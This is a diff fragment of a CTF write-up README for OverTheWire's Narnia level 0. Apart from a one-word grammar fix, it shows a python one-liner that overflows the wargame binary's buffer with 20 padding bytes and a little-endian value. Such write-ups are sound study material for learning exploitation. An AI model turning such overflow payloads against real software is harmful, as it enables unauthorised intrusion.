Alpackers/CTF-Writeups/Misc/OverTheWire/Narnia/Naria0/Readme.md

 >val: 0xefbeadde
 >WAY OFF!!!!
 >```
 > Our buffer shows that we inserted ```RRRRRRRRRRRRRRRRRRRRޭ�``` which we obviously wouldn't have been able to type in.
-However, we forget about the little endian part and our value aren't in the correct order.
+However, we forget about the little endian part and our values aren't in the correct order.
 Let's fix that.
 >
 >```
 ># python -c 'print "R"*20+"\xef\xbe\xad\xde"' | ./narnia0